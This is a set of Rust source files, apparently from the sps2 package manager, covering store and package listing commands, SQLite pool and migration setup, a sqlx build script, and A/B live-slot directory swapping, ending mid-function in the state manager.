                let perms = format_permissions(&metadata);
                if let Some(names) = file_map.get(full_hash) {
                    for file_name in names {
                        println!(
                            "{}{} {:>8} {} -> {}",
                            indent,
                            perms,
                            size,
                            style_dimmed(short_hash(full_hash, 16), use_color),
                            style_green(file_name, use_color)
                        );
                    }
                } else {
                    println!(
                        "{}{} {:>8} {} (unknown)",
                        indent,
                        perms,
                        size,
                        style_dimmed(short_hash(full_hash, 16), use_color)
                    );
                }
            } else {
                // Default: short hash + filename
                if let Some(names) = file_map.get(full_hash) {
                    for file_name in names {
                        println!(
                            "{}{} {}",
                            indent,
                            style_dimmed(short_hash(full_hash, 8), use_color),
                            style_green(file_name, use_color)
                        );
                    }
                } else {
                    println!(
                        "{}{} (unknown)",
                        indent,
                        style_dimmed(short_hash(full_hash, 8), use_color)
                    );
                }
            }
        }
    }
    Ok(())
}
/// List store objects matching a hex hash prefix.
///
/// The store fans objects out as `objects/<first 2 hex>/<next 2 hex>/<hash>`,
/// so the prefix length decides what is shown (see the match below). Prefixes
/// shorter than 2 characters or containing non-hex characters are rejected
/// with a message on stderr; all "not found" cases also report via stderr and
/// return `Ok` so the process exit code stays zero.
async fn list_specific(
    store_path: &Path,
    path_or_hash: &str,
    file_map: &HashMap<String, Vec<String>>,
    long_format: bool,
    hash_only: bool,
    recursive: bool,
    use_color: bool,
) -> Result<(), Box<dyn std::error::Error>> {
    // Check if it's a hex hash prefix with at least 2 chars
    let is_hex = path_or_hash.chars().all(|c| c.is_ascii_hexdigit());
    if path_or_hash.len() >= 2 && is_hex {
        // Hashes are stored lowercase; normalize the user's prefix to match.
        let prefix = path_or_hash.to_ascii_lowercase();
        let prefix1 = &prefix[..2];
        let objects = store_path.join("objects");
        let p1_dir = objects.join(prefix1);
        if !p1_dir.exists() {
            eprintln!("No objects found with prefix '{path_or_hash}'");
            return Ok(());
        }
        // Length-based behavior:
        // - len == 2: list second-level dirs (00-ff)
        // - len == 3: list second-level dirs starting with the 3rd nibble
        // - len >= 4: list files in p1/p2 whose name starts with full prefix
        match prefix.len() {
            2 => {
                let mut entries = fs::read_dir(&p1_dir).await?;
                let mut dirs = Vec::new();
                while let Some(e) = entries.next_entry().await? {
                    if e.file_type().await?.is_dir() {
                        dirs.push(e.file_name().to_string_lossy().to_string());
                    }
                }
                dirs.sort();
                if recursive {
                    for d in dirs {
                        println!("{}/", style_blue(&d, use_color));
                        // Box::pin: see list_recursive — async recursion needs
                        // a heap-pinned future.
                        Box::pin(list_recursive(
                            &p1_dir.join(&d),
                            file_map,
                            long_format,
                            hash_only,
                            use_color,
                            1,
                        ))
                        .await?;
                    }
                } else {
                    for d in dirs {
                        println!("{}/", style_blue(&d, use_color));
                    }
                }
            }
            3 => {
                // Only one nibble of the second directory level is known, so
                // filter second-level directory names by that single character.
                let p2_prefix = &prefix[2..3];
                let mut entries = fs::read_dir(&p1_dir).await?;
                let mut dirs = Vec::new();
                while let Some(e) = entries.next_entry().await? {
                    if e.file_type().await?.is_dir() {
                        let name = e.file_name().to_string_lossy().to_string();
                        if name.starts_with(p2_prefix) {
                            dirs.push(name);
                        }
                    }
                }
                if dirs.is_empty() {
                    eprintln!("No objects found with prefix '{path_or_hash}'");
                } else {
                    dirs.sort();
                    if recursive {
                        for d in dirs {
                            println!("{}/", style_blue(&d, use_color));
                            Box::pin(list_recursive(
                                &p1_dir.join(&d),
                                file_map,
                                long_format,
                                hash_only,
                                use_color,
                                1,
                            ))
                            .await?;
                        }
                    } else {
                        for d in dirs {
                            println!("{}/", style_blue(&d, use_color));
                        }
                    }
                }
            }
            _ => {
                // len >= 4
                let p2 = &prefix[2..4];
                let dir = p1_dir.join(p2);
                if !dir.exists() {
                    eprintln!("No objects found with prefix '{path_or_hash}'");
                    return Ok(());
                }
                let mut entries = fs::read_dir(&dir).await?;
                let mut found = false;
                while let Some(entry) = entries.next_entry().await? {
                    let name = entry.file_name().to_string_lossy().to_string();
                    // In the current layout, 'name' is the full hash
                    if !name.starts_with(&prefix) {
                        continue;
                    }
                    found = true;
                    let full_hash = name;
                    let metadata = entry.metadata().await?;
                    if hash_only {
                        println!("{full_hash}");
                    } else if long_format {
                        let size = format_size(metadata.len());
                        let perms = format_permissions(&metadata);
                        if let Some(names) = file_map.get(&full_hash) {
                            for file_name in names {
                                println!(
                                    "{} {:>8} {} -> {}",
                                    perms,
                                    size,
                                    style_dimmed(short_hash(&full_hash, 16), use_color),
                                    style_green(file_name, use_color)
                                );
                            }
                        } else {
                            println!(
                                "{} {:>8} {} (unknown)",
                                perms,
                                size,
                                style_dimmed(short_hash(&full_hash, 16), use_color)
                            );
                        }
                    } else if let Some(names) = file_map.get(&full_hash) {
                        for file_name in names {
                            println!(
                                "{} {}",
                                style_dimmed(short_hash(&full_hash, 8), use_color),
                                style_green(file_name, use_color)
                            );
                        }
                    } else {
                        println!(
                            "{} (unknown)",
                            style_dimmed(short_hash(&full_hash, 8), use_color)
                        );
                    }
                }
                if !found {
                    eprintln!("No objects found with prefix '{path_or_hash}'");
                }
            }
        }
    } else {
        eprintln!("Invalid hash prefix: {path_or_hash}");
    }
    Ok(())
}
/// Truncate `s` to at most `n` bytes for display.
///
/// Uses the boundary-checked `str::get` instead of `&s[..n]`: slicing would
/// panic if `n` did not land on a UTF-8 character boundary. That cannot happen
/// for the ASCII hex hashes this tool prints, but the checked form keeps the
/// helper panic-free for arbitrary input (falling back to the full string).
fn short_hash(s: &str, n: usize) -> &str {
    s.get(..n).unwrap_or(s)
}
/// Render an `ls -l`-style ten-character permission string (`drwxr-xr--`).
///
/// On Unix the low nine mode bits are decoded into user/group/other triads;
/// elsewhere only the read-only flag is available, so a fixed approximation
/// is returned.
fn format_permissions(metadata: &std::fs::Metadata) -> String {
    #[cfg(unix)]
    {
        use std::os::unix::fs::PermissionsExt;
        let mode = metadata.permissions().mode();
        let mut rendered = String::with_capacity(10);
        rendered.push(if metadata.is_dir() { 'd' } else { '-' });
        // user, group, other triads live at bit offsets 6, 3 and 0.
        for shift in [6u32, 3, 0] {
            let triad = (mode >> shift) & 0o7;
            rendered.push(if triad & 0o4 != 0 { 'r' } else { '-' });
            rendered.push(if triad & 0o2 != 0 { 'w' } else { '-' });
            rendered.push(if triad & 0o1 != 0 { 'x' } else { '-' });
        }
        rendered
    }
    #[cfg(not(unix))]
    {
        if metadata.permissions().readonly() {
            "-r--r--r--".to_string()
        } else {
            "-rw-rw-rw-".to_string()
        }
    }
}
/// Wrap `text` in an ANSI escape sequence (`ESC[<code>` … `ESC[0m`) when
/// color output is enabled; otherwise return the text unchanged.
fn apply_ansi_style(text: &str, code: &str, use_color: bool) -> String {
    if !use_color {
        return text.to_string();
    }
    // "\x1b[" (2) + code + text + "\x1b[0m" (4) = len + 6 extra bytes.
    let mut styled = String::with_capacity(text.len() + code.len() + 6);
    styled.push_str("\x1b[");
    styled.push_str(code);
    styled.push_str(text);
    styled.push_str("\x1b[0m");
    styled
}
/// Dim/faint (SGR 2) — used for hashes.
fn style_dimmed(text: &str, use_color: bool) -> String {
    apply_ansi_style(text, "2m", use_color)
}
/// Blue foreground (SGR 34) — used for directory names.
fn style_blue(text: &str, use_color: bool) -> String {
    apply_ansi_style(text, "34m", use_color)
}
/// Green foreground (SGR 32) — used for mapped file names.
fn style_green(text: &str, use_color: bool) -> String {
    apply_ansi_style(text, "32m", use_color)
}
/// Yellow foreground (SGR 33) — used for package versions.
fn style_yellow(text: &str, use_color: bool) -> String {
    apply_ansi_style(text, "33m", use_color)
}
/// Cyan foreground (SGR 36) — used for package names.
fn style_cyan(text: &str, use_color: bool) -> String {
    apply_ansi_style(text, "36m", use_color)
}
/// Human-readable byte count: exact bytes below 1 KiB ("512 B"), one decimal
/// place above ("1.5 KB"), scaling in steps of 1024 up to TB.
fn format_size(bytes: u64) -> String {
    const UNITS: &[&str] = &["B", "KB", "MB", "GB", "TB"];
    let mut value = bytes as f64;
    let mut idx = 0;
    while value >= 1024.0 && idx + 1 < UNITS.len() {
        value /= 1024.0;
        idx += 1;
    }
    match idx {
        0 => format!("{value:.0} {}", UNITS[idx]),
        _ => format!("{value:.1} {}", UNITS[idx]),
    }
}
/// Build a map from package store hash to `(name, version)` for every
/// package recorded in the database.
///
/// Used by the `--packages` views to label `store/packages/<hash>` entries.
async fn load_package_mappings(
    db_path: &Path,
) -> Result<HashMap<String, (String, String)>, Box<dyn std::error::Error>> {
    let mut map = HashMap::new();
    // Open database connection using state crate
    let pool = create_pool(db_path).await?;
    let mut conn = pool.acquire().await?;
    let mut tx = conn.begin().await?;
    // Query packages with their hashes
    use sqlx::Row;
    let rows = sqlx::query(
        r#"
        SELECT
            hash,
            name,
            version
        FROM packages
        ORDER BY name, version
        "#,
    )
    .fetch_all(&mut *tx)
    .await?;
    for row in rows {
        let hash: String = row.get("hash");
        let name: String = row.get("name");
        let version: String = row.get("version");
        // Later rows with the same hash overwrite earlier ones; with one row
        // per package hash this is a plain insert.
        map.insert(hash, (name, version));
    }
    tx.commit().await?;
    Ok(map)
}
/// List every package directory under `store/packages`, labelled with the
/// package name and version from `package_map` when known.
///
/// With `long_format`, permissions are shown and `recursive` additionally
/// lists each package directory's immediate contents (one level deep).
/// A missing packages directory is reported on stderr and treated as success.
async fn list_packages(
    store_path: &Path,
    package_map: &HashMap<String, (String, String)>,
    long_format: bool,
    recursive: bool,
    use_color: bool,
) -> Result<(), Box<dyn std::error::Error>> {
    let packages_dir = store_path.join("packages");
    if !packages_dir.exists() {
        eprintln!(
            "Packages directory does not exist: {}",
            packages_dir.display()
        );
        return Ok(());
    }
    let mut entries = fs::read_dir(&packages_dir).await?;
    let mut packages = Vec::new();
    while let Some(entry) = entries.next_entry().await? {
        if entry.file_type().await?.is_dir() {
            packages.push(entry);
        }
    }
    // Sort by name
    packages.sort_by_key(|e| e.file_name());
    for entry in packages {
        // Directory name is the package's store hash.
        let hash = entry.file_name().to_string_lossy().to_string();
        if long_format {
            let metadata = entry.metadata().await?;
            let perms = format_permissions(&metadata);
            if let Some((name, version)) = package_map.get(&hash) {
                println!(
                    "{} {} ({}:{})",
                    perms,
                    style_dimmed(&hash, use_color),
                    style_cyan(name, use_color),
                    style_yellow(version, use_color)
                );
            } else {
                println!(
                    "{} {} (unknown package)",
                    perms,
                    style_dimmed(&hash, use_color)
                );
            }
            if recursive {
                // List contents of package directory
                let mut pkg_entries = fs::read_dir(entry.path()).await?;
                let mut files = Vec::new();
                while let Some(pkg_entry) = pkg_entries.next_entry().await? {
                    files.push(pkg_entry.file_name().to_string_lossy().to_string());
                }
                files.sort();
                for file in files {
                    println!(" {}", style_green(&file, use_color));
                }
            }
        } else {
            // Short format
            if let Some((name, version)) = package_map.get(&hash) {
                println!(
                    "{} -> {}:{}",
                    style_dimmed(short_hash(&hash, 16), use_color),
                    style_cyan(name, use_color),
                    style_yellow(version, use_color)
                );
            } else {
                println!(
                    "{} (unknown)",
                    style_dimmed(short_hash(&hash, 16), use_color)
                );
            }
        }
    }
    Ok(())
}
/// List package directories whose store hash starts with `hash_prefix`.
///
/// Matching entries are labelled with name/version from `package_map` when
/// known. With `long_format`, permissions and the package directory's
/// immediate contents are also printed. "Not found" and a missing packages
/// directory are reported on stderr and treated as success.
async fn list_specific_package(
    store_path: &Path,
    hash_prefix: &str,
    package_map: &HashMap<String, (String, String)>,
    long_format: bool,
    use_color: bool,
) -> Result<(), Box<dyn std::error::Error>> {
    let packages_dir = store_path.join("packages");
    if !packages_dir.exists() {
        eprintln!(
            "Packages directory does not exist: {}",
            packages_dir.display()
        );
        return Ok(());
    }
    let mut entries = fs::read_dir(&packages_dir).await?;
    let mut found = false;
    while let Some(entry) = entries.next_entry().await? {
        if entry.file_type().await?.is_dir() {
            // Directory name is the package's store hash.
            let hash = entry.file_name().to_string_lossy().to_string();
            if hash.starts_with(hash_prefix) {
                found = true;
                if long_format {
                    let metadata = entry.metadata().await?;
                    let perms = format_permissions(&metadata);
                    if let Some((name, version)) = package_map.get(&hash) {
                        println!(
                            "{} {} ({}:{})",
                            perms,
                            style_dimmed(&hash, use_color),
                            style_cyan(name, use_color),
                            style_yellow(version, use_color)
                        );
                    } else {
                        println!(
                            "{} {} (unknown package)",
                            perms,
                            style_dimmed(&hash, use_color)
                        );
                    }
                    // List contents of package directory
                    let mut pkg_entries = fs::read_dir(entry.path()).await?;
                    let mut files = Vec::new();
                    while let Some(pkg_entry) = pkg_entries.next_entry().await? {
                        files.push(pkg_entry.file_name().to_string_lossy().to_string());
                    }
                    files.sort();
                    for file in files {
                        println!(" {}", style_green(&file, use_color));
                    }
                } else {
                    // Short format
                    if let Some((name, version)) = package_map.get(&hash) {
                        println!(
                            "{} -> {}:{}",
                            style_dimmed(&hash, use_color),
                            style_cyan(name, use_color),
                            style_yellow(version, use_color)
                        );
                    } else {
                        println!("{} (unknown)", style_dimmed(&hash, use_color));
                    }
                }
            }
        }
    }
    if !found {
        eprintln!("No packages found with prefix '{hash_prefix}'");
    }
    Ok(())
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/build.rs | crates/state/build.rs | use std::env;
use std::path::PathBuf;
/// Build script: points sqlx at a prepared-query cache and forces offline
/// mode, unless the caller already configured either via the environment.
fn main() {
    if env::var("SQLX_OFFLINE_DIR").is_err() {
        // Probe known cache locations in priority order so the build works
        // both from an installed /opt/pm prefix and from a plain checkout.
        let mut candidates = vec![PathBuf::from("/opt/pm/.sqlx"), PathBuf::from(".sqlx")];
        // The original `env::current_dir().unwrap()` could panic the build
        // script outright; degrade gracefully if the cwd is unavailable.
        if let Ok(cwd) = env::current_dir() {
            candidates.push(cwd.join(".sqlx"));
        }
        if let Some(dir) = candidates.iter().find(|dir| dir.exists()) {
            println!("cargo:rustc-env=SQLX_OFFLINE_DIR={}", dir.display());
        }
    }
    // Force offline mode in production builds
    if env::var("SQLX_OFFLINE").is_err() {
        println!("cargo:rustc-env=SQLX_OFFLINE=true");
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/lib.rs | crates/state/src/lib.rs | #![warn(mismatched_lifetime_syntaxes)]
#![deny(clippy::pedantic, unsafe_code)]
#![allow(
clippy::needless_raw_string_hashes,
clippy::cast_possible_truncation,
clippy::cast_sign_loss,
clippy::cast_possible_wrap,
clippy::cast_lossless,
clippy::map_unwrap_or,
clippy::unused_async,
clippy::missing_panics_doc
)]
#![allow(clippy::module_name_repetitions)]
//! State management for sps2
//!
//! This crate manages the `SQLite` database that tracks system state,
//! installed packages, and enables atomic updates with rollback.
pub mod db;
pub mod file_models;
pub mod file_queries_runtime;
pub mod live_slots;
pub mod manager;
pub mod models;
#[cfg(feature = "runtime-queries")]
pub use manager::{StateManager, TransactionData};
pub mod queries {
pub use crate::file_queries_runtime::*;
pub use crate::queries_runtime::*;
}
#[cfg(feature = "runtime-queries")]
mod queries_runtime;
pub use file_models::{
DeduplicationResult, FileMTimeTracker, FileMetadata, FileObject, FileReference,
FileStorageStats, InstalledFile, PackageFileEntry,
};
pub use models::{Package, PackageRef, State, StoreRef};
use sps2_errors::Error;
use sqlx::sqlite::{SqliteConnectOptions, SqliteJournalMode, SqlitePoolOptions};
use sqlx::{Pool, Sqlite};
use std::path::Path;
use std::time::Duration;
/// Create a new `SQLite` connection pool
///
/// The pool uses WAL journaling, a 30-second busy timeout, at most five
/// connections, and creates the database file if it does not exist. After
/// connecting, a set of best-effort performance pragmas is applied.
///
/// # Errors
///
/// Returns an error if the database connection fails or configuration is invalid.
pub async fn create_pool(db_path: &Path) -> Result<Pool<Sqlite>, Error> {
    let options = SqliteConnectOptions::new()
        .filename(db_path)
        .create_if_missing(true)
        .journal_mode(SqliteJournalMode::Wal)
        .busy_timeout(Duration::from_secs(30));
    let pool = SqlitePoolOptions::new()
        .max_connections(5)
        .connect_with(options)
        .await
        .map_err(|e| {
            Error::from(sps2_errors::StateError::DatabaseError {
                message: e.to_string(),
            })
        })?;
    // Best-effort tuning: each `let _ =` deliberately ignores failures so an
    // unsupported pragma can never prevent the pool from being returned.
    // NOTE(review): most of these pragmas are per-connection in SQLite; they
    // are only applied to the single connection acquired here, so other pooled
    // connections may not carry them — confirm this is intended.
    if let Ok(mut conn) = pool.acquire().await {
        let _ = sqlx::query("PRAGMA synchronous = NORMAL")
            .execute(&mut *conn)
            .await;
        let _ = sqlx::query("PRAGMA temp_store = MEMORY")
            .execute(&mut *conn)
            .await;
        let _ = sqlx::query("PRAGMA mmap_size = 268435456")
            .execute(&mut *conn)
            .await;
        let _ = sqlx::query("PRAGMA cache_size = -20000")
            .execute(&mut *conn)
            .await;
        let _ = sqlx::query("PRAGMA wal_autocheckpoint = 1000")
            .execute(&mut *conn)
            .await;
    }
    Ok(pool)
}
/// Apply all pending database migrations bundled with this crate
/// (embedded from `./migrations` at compile time).
///
/// # Errors
///
/// Returns an error if any migration fails to execute.
pub async fn run_migrations(pool: &Pool<Sqlite>) -> Result<(), Error> {
    match sqlx::migrate!("./migrations").run(pool).await {
        Ok(()) => Ok(()),
        Err(e) => Err(sps2_errors::StateError::MigrationFailed {
            message: e.to_string(),
        }
        .into()),
    }
}
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/live_slots.rs | crates/state/src/live_slots.rs | //! Slot management for the live prefix.
//!
//! Slots provide two alternating directories that back the `/opt/pm/live`
//! filesystem tree. Every operation stages into the inactive slot, commits do a
//! pair of atomic renames so `/opt/pm/live` always remains a real directory, and
//! the inactive slot retains the previous state for rollback.
use serde::{Deserialize, Serialize};
use sps2_errors::Error;
use sps2_platform::filesystem_helpers as fs;
use sps2_types::state::SlotId;
use std::io::ErrorKind;
use std::path::{Path, PathBuf};
use tokio::fs as tokio_fs;
use uuid::Uuid;
// Name of the per-slot marker file recording which state id the slot holds.
const SLOT_STATE_FILENAME: &str = "STATE";
/// Persisted bookkeeping for the two live slots, stored as JSON
/// (`live_slots.json` in the state directory — see `LiveSlots::initialize`).
#[derive(Debug, Clone, Serialize, Deserialize)]
struct SlotMetadata {
    // Which slot currently backs the live prefix.
    active: SlotId,
    // State id last recorded for slot A; `None` when unknown/empty.
    // `#[serde(default)]` keeps older metadata files (without this field)
    // deserializable.
    #[serde(default)]
    live_a: Option<Uuid>,
    // State id last recorded for slot B; same defaulting rules as `live_a`.
    #[serde(default)]
    live_b: Option<Uuid>,
}
impl Default for SlotMetadata {
    // Fresh installations start with slot A active and no recorded states.
    fn default() -> Self {
        Self {
            active: SlotId::A,
            live_a: None,
            live_b: None,
        }
    }
}
impl SlotMetadata {
    /// Recorded state id for `slot`, if any.
    fn state(&self, slot: SlotId) -> Option<Uuid> {
        match slot {
            SlotId::A => self.live_a,
            SlotId::B => self.live_b,
        }
    }
    /// Overwrite the recorded state id for `slot`.
    fn set_state(&mut self, slot: SlotId, value: Option<Uuid>) {
        match slot {
            SlotId::A => self.live_a = value,
            SlotId::B => self.live_b = value,
        }
    }
}
/// Manages alternating live slots.
pub struct LiveSlots {
    // The live prefix directory users see (created on initialize if absent).
    live_path: PathBuf,
    // Parent directory containing one subdirectory per slot.
    slots_dir: PathBuf,
    // Location of the serialized `SlotMetadata` JSON file.
    metadata_path: PathBuf,
    // In-memory copy of the persisted slot metadata.
    metadata: SlotMetadata,
}
impl LiveSlots {
    /// Initialize slot tracking.
    ///
    /// Creates the `slots/` tree (one directory per slot), ensures the live
    /// path exists, loads persisted metadata (defaulting when the file is
    /// absent), and immediately re-persists so the metadata file always
    /// exists after construction.
    ///
    /// # Errors
    ///
    /// Returns an error if filesystem operations fail or metadata loading fails.
    pub async fn initialize(state_dir: PathBuf, live_path: PathBuf) -> Result<Self, Error> {
        let slots_dir = state_dir.join("slots");
        fs::create_dir_all(&slots_dir).await?;
        for slot in SlotId::ALL {
            fs::create_dir_all(&slots_dir.join(slot.dir_name())).await?;
        }
        if !fs::exists(&live_path).await {
            fs::create_dir_all(&live_path).await?;
        }
        let metadata_path = state_dir.join("live_slots.json");
        let metadata = Self::load_metadata(&metadata_path).await?;
        let slots = Self {
            live_path,
            slots_dir,
            metadata_path,
            metadata,
        };
        slots.persist_metadata().await?;
        Ok(slots)
    }
    /// Returns the currently active slot.
    #[must_use]
    pub fn active_slot(&self) -> SlotId {
        self.metadata.active
    }
    /// Returns the inactive slot (target for staging).
    #[must_use]
    pub fn inactive_slot(&self) -> SlotId {
        self.metadata.active.other()
    }
    /// Filesystem path for a slot directory.
    #[must_use]
    pub fn slot_path(&self, slot: SlotId) -> PathBuf {
        self.slots_dir.join(slot.dir_name())
    }
    /// Lookup the recorded state for a slot.
    #[must_use]
    pub fn slot_state(&self, slot: SlotId) -> Option<Uuid> {
        self.metadata.state(slot)
    }
    /// Ensure a slot directory exists and return its path.
    ///
    /// # Errors
    ///
    /// Returns an error if creating the directory fails.
    pub async fn ensure_slot_dir(&mut self, slot: SlotId) -> Result<PathBuf, Error> {
        let path = self.slot_path(slot);
        fs::create_dir_all(&path).await?;
        Ok(path)
    }
    /// Record (or clear) the state marker for a slot and persist metadata.
    ///
    /// Writes the on-disk `STATE` marker first, then updates the in-memory
    /// metadata and persists it (unlike `set_slot_state`, which skips the
    /// marker).
    ///
    /// # Errors
    ///
    /// Returns an error if writing the marker or persisting metadata fails.
    pub async fn record_slot_state(
        &mut self,
        slot: SlotId,
        state: Option<Uuid>,
    ) -> Result<(), Error> {
        self.write_slot_marker(slot, state).await?;
        self.metadata.set_state(slot, state);
        self.persist_metadata().await
    }
    /// Update metadata without touching markers.
    ///
    /// # Errors
    ///
    /// Returns an error if persisting metadata fails.
    pub async fn set_slot_state(&mut self, slot: SlotId, state: Option<Uuid>) -> Result<(), Error> {
        self.metadata.set_state(slot, state);
        self.persist_metadata().await
    }
    /// Refresh state markers from disk.
    ///
    /// The per-slot `STATE` files are treated as the source of truth: a
    /// missing marker clears the recorded state, an unreadable one is an
    /// error. The refreshed view is persisted back to the metadata file.
    ///
    /// # Errors
    ///
    /// Returns an error if reading markers or persisting metadata fails.
    pub async fn refresh_slot_states(&mut self) -> Result<(), Error> {
        for slot in SlotId::ALL {
            let marker_path = self.slot_path(slot).join(SLOT_STATE_FILENAME)
;
            let state = match tokio_fs::read_to_string(&marker_path).await {
                Ok(content) => parse_state_marker(&content)?,
                Err(err) if err.kind() == ErrorKind::NotFound => None,
                Err(err) => {
                    return Err(Error::internal(format!(
                        "failed to read slot marker {}: {err}",
                        marker_path.display()
                    )))
                }
            };
            self.metadata.set_state(slot, state);
        }
        self.persist_metadata().await
    }
    /// Swap the prepared slot into `/opt/pm/live`, preserving the previous live
    /// directory under the previously active slot path.
    ///
    /// # Errors
    ///
    /// Returns an error if filesystem operations fail.
    pub async fn swap_to_live(
        &mut self,
        staging_slot: SlotId,
        new_state: Uuid,
        parent_state: Uuid,
    ) -> Result<(), Error> {
        let current_active = self.metadata.active;
        let live_path = self.live_path.clone();
        let staging_path = self.slot_path(staging_slot);
        let backup_path = self.slot_path(current_active);
        // The previously-active slot becomes the rollback copy; clear whatever
        // it held from the last cycle before moving the live tree into it.
        if fs::exists(&backup_path).await {
            fs::remove_dir_all(&backup_path).await?;
        }
        // First rename: current live tree -> old-active slot (rollback copy).
        if fs::exists(&live_path).await {
            fs::atomic_rename(&live_path, &backup_path).await?;
        }
        if let Some(parent) = live_path.parent() {
            fs::create_dir_all(parent).await?;
        }
        // Second rename: staged slot -> live.
        // NOTE(review): between the two renames the live path is briefly
        // absent — confirm crash recovery (slot markers + refresh_slot_states)
        // tolerates a failure inside that window.
        fs::atomic_rename(&staging_path, &live_path).await?;
        // Recreate an empty directory for the slot we just promoted so future
        // operations can stage into it once it becomes inactive again.
        fs::create_dir_all(&staging_path).await?;
        self.write_slot_marker(staging_slot, Some(new_state))
            .await?;
        self.metadata.active = staging_slot;
        self.metadata.set_state(staging_slot, Some(new_state));
        self.metadata.set_state(current_active, Some(parent_state));
        self.persist_metadata().await
    }
    // Write (Some) or delete (None) the slot's on-disk STATE marker file.
    async fn write_slot_marker(&self, slot: SlotId, state: Option<Uuid>) -> Result<(), Error> {
        let marker_path = self.slot_path(slot).join(SLOT_STATE_FILENAME);
        match state {
            Some(id) => tokio_fs::write(&marker_path, id.to_string())
                .await
                .map_err(|e| Error::internal(format!("failed to write slot marker: {e}")))?,
            None => {
                if fs::exists(&marker_path).await {
                    fs::remove_file(&marker_path).await?;
                }
            }
        }
        Ok(())
    }
    // Atomically persist metadata: write to a temp path, then rename over the
    // real file so readers never observe a partially-written JSON document.
    async fn persist_metadata(&self) -> Result<(), Error> {
        let payload = serde_json::to_vec_pretty(&self.metadata)
            .map_err(|e| Error::internal(format!("failed to serialise slot metadata: {e}")))?;
        let tmp_path = self.metadata_path.with_extension("json.tmp");
        if let Some(parent) = self.metadata_path.parent() {
            fs::create_dir_all(parent).await?;
        }
        // A stale temp path could be a file or (unexpectedly) a directory;
        // attempt both removals best-effort before rewriting it.
        if fs::exists(&tmp_path).await {
            fs::remove_dir_all(&tmp_path).await.ok();
            fs::remove_file(&tmp_path).await.ok();
        }
        tokio_fs::write(&tmp_path, payload)
            .await
            .map_err(|e| Error::internal(format!("failed to write slot metadata: {e}")))?;
        tokio_fs::rename(&tmp_path, &self.metadata_path)
            .await
            .map_err(|e| Error::internal(format!("failed to commit slot metadata: {e}")))?;
        Ok(())
    }
    // Load persisted metadata; a missing file yields the default (slot A
    // active, no recorded states) rather than an error.
    async fn load_metadata(path: &Path) -> Result<SlotMetadata, Error> {
        if !fs::exists(path).await {
            return Ok(SlotMetadata::default());
        }
        let bytes = tokio_fs::read(path)
            .await
            .map_err(|e| Error::internal(format!("failed to read slot metadata: {e}")))?;
        serde_json::from_slice(&bytes)
            .map_err(|e| Error::internal(format!("failed to parse slot metadata: {e}")))
    }
}
/// Parse the contents of a slot marker file into an optional state UUID.
///
/// An empty (or whitespace-only) marker means "no state recorded" and
/// yields `Ok(None)`; any other content must parse as a UUID.
fn parse_state_marker(value: &str) -> Result<Option<Uuid>, Error> {
    let trimmed = value.trim();
    if trimmed.is_empty() {
        return Ok(None);
    }
    Uuid::parse_str(trimmed)
        .map(Some)
        .map_err(|e| Error::internal(format!("invalid slot marker value: {e}")))
| rust | BSD-3-Clause | a357a9ae7317314ef1605ce29b66f064bd6eb510 | 2026-01-04T20:17:02.345249Z | false |
alexykn/sps2 | https://github.com/alexykn/sps2/blob/a357a9ae7317314ef1605ce29b66f064bd6eb510/crates/state/src/manager.rs | crates/state/src/manager.rs | //! State manager implementation
use crate::{
live_slots::LiveSlots,
models::{Package, PackageRef, State, StoreRef},
queries,
};
use sps2_errors::Error;
use sps2_events::{AppEvent, CleanupSummary, EventEmitter, EventSender, GeneralEvent, StateEvent};
use sps2_hash::Hash;
use sps2_platform::filesystem_helpers as sps2_root;
use sps2_types::{state::SlotId, StateId};
use sqlx::{Pool, Sqlite};
use std::convert::TryFrom;
use std::path::PathBuf;
use std::sync::Arc;
use std::time::Instant;
use tokio::sync::Mutex;
use uuid::Uuid;
/// State manager for atomic updates
#[derive(Clone)]
pub struct StateManager {
    // SQLite connection pool backing all state queries.
    pool: Pool<Sqlite>,
    // Directory containing per-state and staging trees.
    state_path: PathBuf,
    // Path of the live (active) prefix.
    live_path: PathBuf,
    /// A/B slot bookkeeping, shared behind an async mutex.
    pub live_slots: Arc<Mutex<LiveSlots>>,
    // Channel used to surface progress/diagnostic events.
    tx: EventSender,
}
impl std::fmt::Debug for StateManager {
    // Manual impl: only the path fields are printed; the pool, slots, and
    // event sender are omitted via `finish_non_exhaustive`.
    fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
        f.debug_struct("StateManager")
            .field("state_path", &self.state_path)
            .field("live_path", &self.live_path)
            .finish_non_exhaustive()
    }
}
impl EventEmitter for StateManager {
    // Expose the internal sender so the trait's `emit` helpers work.
    fn event_sender(&self) -> Option<&EventSender> {
        Some(&self.tx)
    }
}
impl StateManager {
/// Insert package rows for every reference, ensure the corresponding CAS
/// row exists, and return a resolver-id → database-row-id map together
/// with the number of packages processed.
async fn add_package_refs_and_build_id_map(
    &self,
    tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
    package_refs: &[PackageRef],
) -> Result<
    (
        std::collections::HashMap<sps2_resolver::PackageId, i64>,
        usize,
    ),
    Error,
> {
    let mut package_id_map =
        std::collections::HashMap::with_capacity(package_refs.len());
    for package_ref in package_refs {
        let row_id = queries::add_package(
            tx,
            &package_ref.state_id,
            &package_ref.package_id.name,
            &package_ref.package_id.version.to_string(),
            &package_ref.hash,
            package_ref.size,
        )
        .await?;
        // Make sure the CAS row exists; refcounts are not touched here.
        queries::get_or_create_store_ref(tx, &package_ref.hash, package_ref.size).await?;
        package_id_map.insert(package_ref.package_id.clone(), row_id);
    }
    Ok((package_id_map, package_refs.len()))
}
/// Record file-level hashes for packages whose per-file digests were
/// computed during install; returns the number of file entries inserted.
async fn process_pending_file_hashes(
    &self,
    tx: &mut sqlx::Transaction<'_, sqlx::Sqlite>,
    package_id_map: &std::collections::HashMap<sps2_resolver::PackageId, i64>,
    pending: &[(sps2_resolver::PackageId, Vec<sps2_hash::FileHashResult>)],
) -> Result<usize, Error> {
    let mut inserted = 0usize;
    for (package_id, file_hashes) in pending {
